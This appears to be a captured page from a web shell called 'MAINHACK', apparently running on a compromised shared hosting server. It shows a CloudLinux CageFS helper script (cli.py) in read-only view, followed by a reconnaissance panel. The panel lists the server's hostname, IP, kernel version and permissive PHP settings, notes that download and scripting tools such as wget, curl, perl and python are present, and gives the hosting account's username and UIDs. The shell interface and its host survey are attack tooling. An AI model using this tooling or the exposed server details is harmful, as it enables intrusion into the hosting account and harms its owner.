[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: cli.py
File is not writable. Editing disabled.
# -*- coding: utf-8 -*- # # Copyright © Cloud Linux GmbH & Cloud Linux Software, Inc 2010-2025 All Rights Reserved # # Licensed under CLOUD LINUX LICENSE AGREEMENT # http://cloudlinux.com/docs/LICENCE.TXT # """ CLI helper utilities for CageFS user commands. Provides functions for: - Re-entering CageFS environment - Calling commands via proxyexec for privilege escalation """ import logging import os import pwd import subprocess import sys from clcommon import clcagefs logger = logging.getLogger(__name__) CAGEFS_TOKEN_PATH = "/var/.cagefs/.cagefs.token" def get_cagefs_token(): """ Read the CageFS token from the token file. Returns: str: The CageFS token, or None if not found """ try: with open(CAGEFS_TOKEN_PATH, "r") as f: return f.read().strip() except (IOError, OSError): return None PROXYEXEC_DAEMON_PATH = "/usr/sbin/proxyexec" def _is_parent_proxyexec(): """ Verify that the parent process is the proxyexec daemon by checking /proc/<ppid>/exe (kernel-controlled, not spoofable). Returns: bool: True if parent process is the proxyexec daemon """ try: ppid = os.getppid() parent_exe = os.readlink("/proc/%d/exe" % ppid) # Kernel appends " (deleted)" when binary is replaced during upgrade if parent_exe.endswith(" (deleted)"): parent_exe = parent_exe[:-len(" (deleted)")] return parent_exe == PROXYEXEC_DAEMON_PATH except (OSError, IOError): return False def is_running_via_proxyexec(): """ Check if the script is running via proxyexec. Verifies both that the PROXYEXEC_UID environment variable is set and that the parent process is the proxyexec daemon binary. This prevents spoofing via environment variable injection. Returns: bool: True if running via proxyexec, False otherwise """ if os.environ.get("PROXYEXEC_UID") is None: return False return _is_parent_proxyexec() def call_via_proxyexec(alias, args_list): """ Call a command via proxyexec to execute with root privileges. Args: alias: The proxyexec command alias (e.g., "CAGEFSCTL_USER_SITE_ISOLATION_LIST") args_list: Additional arguments to pass Returns: int: Exit code from the proxyexec command, or None on error """ token = get_cagefs_token() if not token: logger.error("Failed to read CageFS token") return None username = pwd.getpwuid(os.getuid()).pw_name cwd = os.getcwd() pid = str(os.getpid()) # Build proxyexec command # Format: /usr/sbin/proxyexec -c cagefs.sock USER CWD ALIAS PID [ARGS...] cmd = [ "/usr/sbin/proxyexec", "-c", "cagefs.sock", username, cwd, alias, pid, ] + args_list env = {"CAGEFS_TOKEN": token} p = subprocess.Popen(cmd, stdout=sys.stdout, stderr=sys.stderr, stdin=sys.stdin, env=env) p.communicate() return p.returncode def reenter_cagefs(argv=None): """ Re-execute inside CageFS when running outside. Args: argv: Command line arguments to pass (defaults to sys.argv) Returns: int: Exit code from the re-executed command """ if argv is None: argv = sys.argv cmd = ["/bin/cagefs_enter"] + argv p = subprocess.Popen(cmd, stdout=sys.stdout, stderr=sys.stderr, stdin=sys.stdin, env={}) p.communicate() return p.returncode def in_cagefs(): """ Check if currently running inside CageFS. Returns: bool: True if inside CageFS, False otherwise """ return clcagefs.in_cagefs()
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: premium264.web-hosting.com
Server IP: 69.57.162.13
PHP Version: 8.1.34
Server Software: LiteSpeed
System: Linux premium264.web-hosting.com 4.18.0-553.45.1.lve.el8.x86_64 #1 SMP Wed Mar 26 12:08:09 UTC 2025 x86_64
HDD Total: 97.87 GB
HDD Free: 73.58 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
None
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Enabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes (py3)
gcc:
No
pkexec:
No
git:
Yes
User Info
Username: kidscntx
User ID (UID): 1154
Group ID (GID): 1112
Script Owner UID: 1154
Current Dir Owner: N/A